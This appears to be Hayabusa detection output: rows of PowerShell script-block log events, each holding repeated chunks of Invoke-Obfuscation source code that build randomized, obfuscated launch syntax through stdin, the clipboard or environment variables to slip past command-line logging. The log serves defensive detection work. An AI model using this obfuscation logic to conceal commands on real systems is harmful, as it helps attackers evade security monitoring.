If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"e the PowerShell command is set in process-level environment variables for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String[]] $EnvVarName ) # Retrieve random variable from variable name array passed in as argument. $EnvVarName = Get-Random -Input $EnvVarName # Generate numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate numerous ways to invoke command stored in environment variable. $GetRandomVariableSyntax = @() $GetRandomVariableSyntax += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + 'env:' + $EnvVarName + ').Value' $GetRandomVariableSyntax += ('(' + '[Environment]::GetEnvironmentVariable(' + ""'$EnvVarName'"" + ',' + ""'Process'"" + ')' + ')') # Select random option from above. $GetRandomVariableSyntax = Get-Random -Input $GetRandomVariableSyntax # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetRandomVariableSyntax If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random invoke operation through the appropriate token obfuscators if $PowerShellStdIn is not simply a value of - from above random options. If($InvokeOption -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $InvokeOption syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($InvokeOption.Contains(""$Char"")) { $InvokeOption = $InvokeOption.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($InvokeOption.Contains('""')) { $InvokeOption = $InvokeOption.Replace('""','\""') } Return $InvokeOption } Function Out-RandomPowerShellStdInInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command passed to powershell.exe via standard input. Invoke-Obfuscation Function: Out-RandomPowerShellStdInInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomPowerShellStdInInvokeSyntax generates random PowerShell syntax for invoking a command passed to powershell.exe via standard input. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent process if passed to powershell.exe via standard input. .EXAMPLE C:\PS> Out-RandomPowerShellStdInInvokeSyntax ( ^& ('v'+( 'aR'+ 'Iabl' ) + 'E' ) ('exE'+'CUTiOnco' +'n'+ 'TeX' + 't' ) -Val).\""INvOKec`oMm`A`ND\"".\""invO`K`es`CRiPt\""(${I`N`puT} ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via standard input for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Build out random PowerShell stdin syntax like: # | powershell - <-- default to this if $NoExit flag is defined because this will cause an error for the other options # | powershell IEX $Input # | powershell $ExecutionContext.InvokeCommand.InvokeScript($Input) # Also including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = (Get-Random -Input $ExecContextVariables) $RandomInputVariable = (Get-Random -Input @('$Input','${Input}')) # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $RandomInputVariable If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # If $NoExit flag is defined in calling function then default to - stdin syntax. It will cause errors for other syntax options. If($NoExit) { $InvokeOption = '-' } # Set $PowerShellStdIn to value of $InvokeOption. $PowerShellStdIn = $InvokeOption # Random case of $PowerShellStdIn. $PowerShellStdIn = ([Char[]]$PowerShellStdIn.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Run random PowerShell Stdin operation through the appropriate token obfuscators. If($PowerShellStdIn -ne '-') { # Run through all available token obfuscation functions in random order. $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) $InvokeOption = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($InvokeOption)) 'RandomWhitespace' 1 } # For obfuscated commands generated for $PowerShellStdIn syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellStdIn.Contains(""$Char"")) { $PowerShellStdIn = $PowerShellStdIn.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellStdIn.Contains('""')) { $PowerShellStdIn = $PowerShellStdIn.Replace('""','\""') } Return $PowerShellStdIn } Function Out-RandomClipboardInvokeSyntax { <# .SYNOPSIS HELPER FUNCTION :: Generates randomized PowerShell syntax for invoking a command stored in the clipboard. Invoke-Obfuscation Function: Out-RandomClipboardInvokeSyntax Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ObfuscatedTokenCommand, Out-EncapsulatedInvokeExpression (found in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-RandomClipboardInvokeSyntax generates random PowerShell syntax for invoking a command stored in the clipboard. This technique is included to show the Blue Team that powershell.exe's command line arguments may not contain any contents of the command itself, but these could be stored in the parent/grandparent process if passed to powershell.exe via clipboard. .EXAMPLE C:\PS> Out-RandomClipboardInvokeSyntax . ( \""{0}{1}\"" -f( \""{1}{0}\""-f 'p','Add-Ty' ),'e' ) -AssemblyName ( \""{1}{0}{3}{2}\""-f ( \""{2}{0}{3}{1}\""-f'Wi','dows.Fo','em.','n'),(\""{1}{0}\""-f 'yst','S'),'s','rm' ) ; (.( \""{0}\"" -f'GV' ) (\""{2}{3}{1}{0}{4}\"" -f 'E','onCoNT','EXEC','UTi','XT')).\""Va`LuE\"".\""inVOK`Ec`OMmANd\"".\""inVOKe`SC`RIpT\""(( [sYsTEM.WInDOwS.foRMS.ClIPbOard]::( \""{1}{0}\""-f (\""{2}{1}{0}\"" -f'XT','tTE','e'),'g').Invoke( ) ) ) ;[System.Windows.Forms.Clipboard]::( \""{1}{0}\""-f'ar','Cle' ).Invoke( ) .NOTES This cmdlet is a helper function for Out-PowerShellLauncher's more sophisticated $LaunchType options where the PowerShell command is passed to powershell.exe via clipboard for command line obfuscation benefits. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> # Set variables necessary for loading appropriate class/type to be able to interact with the clipboard. $ReflectionAssembly = Get-Random -Input @('System.Reflection.Assembly','Reflection.Assembly') $WindowsClipboard = Get-Random -Input @('Windows.Clipboard','System.Windows.Clipboard') $WindowsFormsClipboard = Get-Random -Input @('System.Windows.Forms.Clipboard','Windows.Forms.Clipboard') # Randomly select flag argument substring for Add-Type -AssemblyCore. $FullArgument = ""-AssemblyName"" # Take into account the shorted flag of -AN as well. $AssemblyNameFlags = @() $AssemblyNameFlags += '-AN' For($Index=2; $Index -le $FullArgument.Length; $Index++) { $AssemblyNameFlags += $FullArgument.SubString(0,$Index) } $AssemblyNameFlag = Get-Random -Input $AssemblyNameFlags # Characters we will use to generate random variable name. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate random variable name. $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Generate paired random syntax options for: A) loading necessary class/assembly, B) retrieving contents from clipboard, and C) clearing/overwritting clipboard contents. $RandomClipSyntaxValue = Get-Random -Input @(1..3) Switch($RandomClipSyntaxValue) { 1 {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } # Escape double-quote with backslash for powershell.exe. If($PowerShellClip.Contains('""')) { $PowerShellClip = $PowerShellClip.Replace('""','\""') } Return $PowerShellClip }",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.296 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag PresentationCore"" $GetClipboardContentsOption = ""([$WindowsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 2 { $LoadClipboardClassOption = ""Add-Type $AssemblyNameFlag System.Windows.Forms"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } 3 { $LoadClipboardClassOption = (Get-Random -Input @('[Void]','$NULL=',""`$$RandomVarName="")) + ""[$ReflectionAssembly]::LoadWithPartialName('System.Windows.Forms')"" $GetClipboardContentsOption = ""([$WindowsFormsClipboard]::GetText())"" $ClearClipboardOption = ""[$WindowsFormsClipboard]::"" + (Get-Random -Input @('Clear()',""SetText(' ')"")) } default {Write-Error ""An invalid RandomClipSyntaxValue value ($RandomClipSyntaxValue) was passed to switch block for Out-RandomClipboardInvokeSyntax.""; Exit;} } # Generate syntax options for invoking clipboard contents, including numerous ways to invoke with $ExecutionContext as a variable, including Get-Variable varname, Get-ChildItem Variable:varname, Get-Item Variable:varname, etc. $ExecContextVariables = @() $ExecContextVariables += '(' + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' ' + ""'variable:"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""').Value"" $ExecContextVariables += '(' + (Get-Random -Input @('Get-Variable','GV','Variable')) + ' ' + ""'"" + (Get-Random -Input @('ex*xt','ExecutionContext')) + ""'"" + (Get-Random -Input (').Value',(' ' + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ')'))) # Select random option from above. $ExecContextVariable = Get-Random -Input $ExecContextVariables # Generate random invoke operation syntax. # 50% split between using $ExecutionContext invocation syntax versus IEX/Invoke-Expression/variable-obfuscated-'iex' syntax generated by Out-EncapsulatedInvokeExpression. $ExpressionToInvoke = $GetClipboardContentsOption If(Get-Random -Input @(0..1)) { # Randomly decide on invoke operation since we've applied an additional layer of string manipulation in above steps. $InvokeOption = Out-EncapsulatedInvokeExpression $ExpressionToInvoke } Else { $InvokeOption = (Get-Random -Input @('$ExecutionContext','${ExecutionContext}',$ExecContextVariable)) + '.InvokeCommand.InvokeScript(' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ExpressionToInvoke + ' '*(Get-Random -Minimum 0 -Maximum 3) + ')' } # Random case of $InvokeOption. $InvokeOption = ([Char[]]$InvokeOption.ToLower() | ForEach-Object {$Char = $_; If(Get-Random -Input (0..1)){$Char = $Char.ToString().ToUpper()} $Char}) -Join '' # Set final syntax for invoking clipboard contents. $PowerShellClip = $LoadClipboardClassOption + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $InvokeOption # Add syntax for clearing clipboard contents. $PowerShellClip = $PowerShellClip + ' '*(Get-Random -Minimum 0 -Maximum 3) + ';' + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ClearClipboardOption # Run through all relevant token obfuscation functions except Type since it causes error for direct type casting relevant classes in a non-interactive PowerShell session. $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Member' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Command' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'CommandArgument' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'Variable' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'String' $PowerShellClip = Out-ObfuscatedTokenCommand -ScriptBlock ([ScriptBlock]::Create($PowerShellClip)) 'RandomWhitespace' # For obfuscated commands generated for $PowerShellClip syntax, single-escape & < > and | characters for cmd.exe. ForEach($Char in @('<','>','|','&')) { # Remove single escaping and then escape all characters. This will handle single-escaped and not-escaped characters. If($PowerShellClip.Contains(""$Char"")) { $PowerShellClip = $PowerShellClip.Replace(""$Char"",""^$Char"") } } 